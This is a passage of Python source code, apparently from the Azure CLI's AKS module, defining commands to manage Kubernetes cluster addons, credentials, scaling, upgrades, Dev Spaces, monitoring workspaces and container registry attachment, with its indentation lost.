# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
if enable_managed_identity and attach_acr:
if result.identity_profile is None or result.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach acr to it, '
'you can manually grant permission to the identity named <ClUSTER_NAME>-agentpool '
'in MC_ resource group to give it permission to pull from ACR.')
else:
kubelet_identity_client_id = result.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
return result
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable=True,
workspace_resource_id=workspace_resource_id, subnet_name=subnet_name, no_wait=no_wait)
if 'omsagent' in instance.addon_profiles and instance.addon_profiles['omsagent'].enabled:
_ensure_container_insights_for_monitoring(cmd, instance.addon_profiles['omsagent'])
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(resource_group_name, name, instance))
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
else:
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name, name, instance)
return result
def aks_get_versions(cmd, client, location):
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_credentials(cmd, client, resource_group_name, name, admin=False,
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
overwrite_existing=False, context_name=None):
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(resource_group_name, name)
else:
credentialResults = client.list_cluster_user_credentials(resource_group_name, name)
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8')
_print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
ADDONS = {
'http_application_routing': 'httpApplicationRouting',
'monitoring': 'omsagent',
'virtual-node': 'aciConnector',
'kube-dashboard': 'kubeDashboard'
}
def aks_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_nulls(list(managed_clusters))
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def aks_update_credentials(cmd, client, resource_group_name, name,
reset_service_principal=False,
reset_aad=False,
service_principal=None,
client_secret=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_client_app_id=None,
aad_tenant_id=None,
no_wait=False):
if bool(reset_service_principal) == bool(reset_aad):
raise CLIError('usage error: --reset-service-principal | --reset-aad-profile')
if reset_service_principal:
if service_principal is None or client_secret is None:
raise CLIError('usage error: --reset-service-principal --service-principal ID --client-secret SECRET')
return sdk_no_wait(no_wait,
client.reset_service_principal_profile,
resource_group_name,
name, service_principal, client_secret)
if not all([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('usage error: --reset-aad --aad-client-app-id ID --aad-server-app-id ID '
'--aad-server-app-secret SECRET [--aad-tenant-id ID]')
parameters = {
'clientAppID': aad_client_app_id,
'serverAppID': aad_server_app_id,
'serverAppSecret': aad_server_app_secret,
'tenantID': aad_tenant_id
}
return sdk_no_wait(no_wait,
client.reset_aad_profile,
resource_group_name,
name, parameters)
def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="", no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
raise CLIError('There are more than one node pool in the cluster. '
'Please specify nodepool name or use az aks nodepool command to scale node pool')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
# pylint: disable=inconsistent-return-statements
def aks_update(cmd, client, resource_group_name, name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None,
uptime_sla=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
attach_acr=None,
detach_acr=None,
api_server_authorized_ip_ranges=None,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
update_aad_profile = not (aad_tenant_id is None and aad_admin_group_object_ids is None)
# pylint: disable=too-many-boolean-expressions
if (update_autoscaler != 1 and cluster_autoscaler_profile is None and
not update_lb_profile and
not attach_acr and
not detach_acr and
not uptime_sla and
api_server_authorized_ip_ranges is None and
not enable_aad and
not update_aad_profile):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--cluster-autoscaler-profile" or '
'"--load-balancer-managed-outbound-ip-count" or'
'"--load-balancer-outbound-ips" or '
'"--load-balancer-outbound-ip-prefixes" or'
'"--load-balancer-outbound-ports" or'
'"--load-balancer-idle-timeout" or'
'"--attach-acr" or "--detach-acr" or'
'"--uptime-sla" or'
'"--api-server-authorized-ip-ranges" or '
'"--enable-aad" or '
'"--aad-tenant-id" or '
'"--aad-admin-group-object-ids"')
instance = client.get(resource_group_name, name)
# For multi-agent pool, use the az aks nodepool command
if update_autoscaler > 0 and len(instance.agent_pool_profiles) > 1:
raise CLIError('There are more than one node pool in the cluster. Please use "az aks nodepool" command '
'to update per node pool auto scaler settings')
_validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already enabled for this node pool.\n'
'Please run "az aks --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
raise CLIError('Cluster autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already disabled for this node pool.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
# if intention is to clear autoscaler profile
if cluster_autoscaler_profile == {}:
instance.auto_scaler_profile = {}
# else profile is provided, update instance profile if it exists
elif cluster_autoscaler_profile:
instance.auto_scaler_profile = _update_dict(instance.auto_scaler_profile.__dict__,
dict((key.replace("-", "_"), value)
for (key, value) in cluster_autoscaler_profile.items())) \
if instance.auto_scaler_profile else cluster_autoscaler_profile
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = ""
if instance.identity is not None and instance.identity.type == "SystemAssigned":
if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
'Please do not set --attach-acr or --detach-acr. '
'You can manually grant or revoke permission to the identity named '
'<ClUSTER_NAME>-agentpool in MC_ resource group to access ACR.')
client_id = instance.identity_profile["kubeletidentity"].client_id
else:
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
if uptime_sla:
instance.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
if update_lb_profile:
instance.network_profile.load_balancer_profile = update_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout,
instance.network_profile.load_balancer_profile)
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(api_server_authorized_ip_ranges, instance=instance)
if enable_aad:
if instance.aad_profile is not None and instance.aad_profile.managed:
raise CLIError('Cannot specify "--enable-aad" if managed AAD is already enabled')
instance.aad_profile = ManagedClusterAADProfile(
managed=True
)
if update_aad_profile:
if instance.aad_profile is None or not instance.aad_profile.managed:
raise CLIError('Cannot specify "--aad-tenant-id/--aad-admin-group-object-ids"'
' if managed AAD is not enabled')
if aad_tenant_id is not None:
instance.aad_profile.tenant_id = aad_tenant_id
if aad_admin_group_object_ids is not None:
instance.aad_profile.admin_group_object_ids = _parse_comma_separated_list(aad_admin_group_object_ids)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
# pylint: disable=unused-argument,inconsistent-return-statements
def aks_upgrade(cmd, client, resource_group_name, name, kubernetes_version, control_plane_only=False,
no_wait=False, yes=False):
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
DEV_SPACES_EXTENSION_NAME = 'dev-spaces'
DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces.custom'
def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None,
endpoint_type='Public', prompt=False):
"""
Use Azure Dev Spaces with a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param update: Update to the latest Azure Dev Spaces client components.
:type update: bool
:param space_name: Name of the new or existing dev space to select. Defaults to an \
interactive selection experience.
:type space_name: String
:param endpoint_type: The endpoint type to be used for a Azure Dev Spaces controller. \
See https://aka.ms/azds-networking for more information.
:type endpoint_type: String
:param prompt: Do not prompt for confirmation. Requires --space.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update):
azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_use_dev_spaces(name, resource_group_name, update, space_name, endpoint_type, prompt)
except TypeError:
raise CLIError("Use '--update' option to get the latest Azure Dev Spaces client components.")
except AttributeError as ae:
raise CLIError(ae)
def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False):
"""
Remove Azure Dev Spaces from a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param prompt: Do not prompt for confirmation.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE):
azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_remove_dev_spaces(name, resource_group_name, prompt)
except AttributeError as ae:
raise CLIError(ae)
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True):
return sdk_no_wait(no_wait, client.rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable, workspace_resource_id=None,
subnet_name=None, no_wait=False):
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
if 'kube-dashboard' in addon_args and 'kubeDashboard' not in addon_profiles:
addon_profiles['kubeDashboard'] = ManagedClusterAddonProfile(enabled=True)
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
addon = ADDONS[addon_arg]
if addon == 'aciConnector':
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# addon name is case insensitive
addon = next((x for x in addon_profiles.keys() if x.lower() == addon.lower()), addon)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == 'omsagent':
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {'logAnalyticsWorkspaceResourceID': workspace_resource_id}
elif addon.lower() == ('aciConnector' + os_type).lower():
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError('The aci-connector addon requires setting a subnet name.')
addon_profile.config = {'SubnetName': subnet_name}
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
raise CLIError("The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension.operations import add_extension_to_path
add_extension_to_path(extension_name)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
workspace_resource_id=None):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles['httpApplicationRouting'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles['kubeDashboard'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles['omsagent'] = ManagedClusterAddonProfile(
enabled=True, config={'logAnalyticsWorkspaceResourceID': workspace_resource_id})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _install_dev_spaces_extension(cmd, extension_name):
try:
from azure.cli.core.extension import operations
operations.add_extension(cmd=cmd, extension_name=extension_name)
except Exception: # nopa pylint: disable=broad-except
return False
return True
def _update_dev_spaces_extension(cmd, extension_name, extension_module):
from azure.cli.core.extension import ExtensionNotInstalledException
try:
from azure.cli.core.extension import operations
operations.update_extension(cmd=cmd, extension_name=extension_name)
operations.reload_extension(extension_name=extension_name)
except CLIError as err:
logger.info(err)
except ExtensionNotInstalledException as err:
logger.debug(err)
return False
except ModuleNotFoundError as err:
logger.debug(err)
logger.error("Error occurred attempting to load the extension module. Use --debug for more information.")
return False
return True
def _get_or_add_extension(cmd, extension_name, extension_module, update=False):
from azure.cli.core.extension import (ExtensionNotInstalledException, get_extension)
try:
get_extension(extension_name)
if update:
return _update_dev_spaces_extension(cmd, extension_name, extension_module)
except ExtensionNotInstalledException:
return _install_dev_spaces_extension(cmd, extension_name)
return True
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# mapping for azure public cloud
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureCloudLocationToOmsRegionCodeMap = {
"australiasoutheast": "ASE",
"australiaeast": "EAU",
"australiacentral": "CAU",
"canadacentral": "CCA",
"centralindia": "CIN",
"centralus": "CUS",
"eastasia": "EA",
"eastus": "EUS",
"eastus2": "EUS2",
"eastus2euap": "EAP",
"francecentral": "PAR",
"japaneast": "EJP",
"koreacentral": "SE",
"northeurope": "NEU",
"southcentralus": "SCUS",
"southeastasia": "SEA",
"uksouth": "SUK",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"westeurope": "WEU",
"westus": "WUS",
"westus2": "WUS2"
}
AzureCloudRegionToOmsRegionMap = {
"australiacentral": "australiacentral",
"australiacentral2": "australiacentral",
"australiaeast": "australiaeast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "southcentralus",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "centralus",
"centralindia": "centralindia",
"eastasia": "eastasia",
"eastus": "eastus",
"eastus2": "eastus2",
"francecentral": "francecentral",
"francesouth": "francecentral",
"japaneast": "japaneast",
"japanwest": "japaneast",
"koreacentral": "koreacentral",
"koreasouth": "koreacentral",
"northcentralus": "eastus",
"northeurope": "northeurope",
"southafricanorth": "westeurope",
"southafricawest": "westeurope",
"southcentralus": "southcentralus",
"southeastasia": "southeastasia",
"southindia": "centralindia",
"uksouth": "uksouth",
"ukwest": "uksouth",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westindia": "centralindia",
"westus": "westus",
"westus2": "westus2"
}
# mapping for azure china cloud
# currently log analytics supported only China East 2 region
AzureChinaLocationToOmsRegionCodeMap = {
"chinaeast": "EAST2",
"chinaeast2": "EAST2",
"chinanorth": "EAST2",
"chinanorth2": "EAST2"
}
AzureChinaRegionToOmsRegionMap = {
"chinaeast": "chinaeast2",
"chinaeast2": "chinaeast2",
"chinanorth": "chinaeast2",
"chinanorth2": "chinaeast2"
}
# mapping for azure us governmner cloud
AzureFairfaxLocationToOmsRegionCodeMap = {
"usgovvirginia": "USGV"
}
AzureFairfaxRegionToOmsRegionMap = {
"usgovvirginia": "usgovvirginia"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
cloud_name = cmd.cli_ctx.cloud.name
workspace_region = "eastus"
workspace_region_code = "EUS"
# sanity check that locations and clouds match.
if ((cloud_name.lower() == 'azurecloud' and AzureChinaRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azurecloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azurecloud) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if ((cloud_name.lower() == 'azurechinacloud' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azurechinacloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azurechinacloud) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if ((cloud_name.lower() == 'azureusgovernment' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azureusgovernment' and AzureChinaRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azureusgovernment) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if cloud_name.lower() == 'azurecloud':
workspace_region = AzureCloudRegionToOmsRegionMap.get(rg_location, "eastus")
workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(workspace_region, "EUS")
elif cloud_name.lower() == 'azurechinacloud':
workspace_region = AzureChinaRegionToOmsRegionMap.get(rg_location, "chinaeast2")
workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(workspace_region, "EAST2")
elif cloud_name.lower() == 'azureusgovernment':
workspace_region = AzureFairfaxRegionToOmsRegionMap.get(rg_location, "usgovvirginia")
workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(workspace_region, "USGV")
else:
workspace_region = rg_location
workspace_region_code = rg_location.upper()
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
try:
resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except CloudError as ex:
if ex.status_code != 404:
raise ex
else:
resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region})
default_workspace_params = {
'location': workspace_region,
'properties': {
'sku': {
'name': 'standalone'
}
}
}
async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
default_workspace_params)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
# Workaround for this addon key which has been seen lowercased in the wild.
if 'loganalyticsworkspaceresourceid' in addon.config:
addon.config['logAnalyticsWorkspaceResourceID'] = addon.config.pop('loganalyticsworkspaceresourceid')
workspace_resource_id = addon.config['logAnalyticsWorkspaceResourceID']
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError('Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id,
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
# Check if the ACR exists by name accross all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def aks_agentpool_show(cmd, client, resource_group_name, cluster_name, nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, client, resource_group_name, cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, client, resource_group_name, cluster_name, nodepool_name,
kubernetes_version=None,
zones=None,
enable_node_public_ip=False,
node_vm_size=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
max_pods=0,
os_type="Linux",
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
tags=None,
labels=None,
mode="User",
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
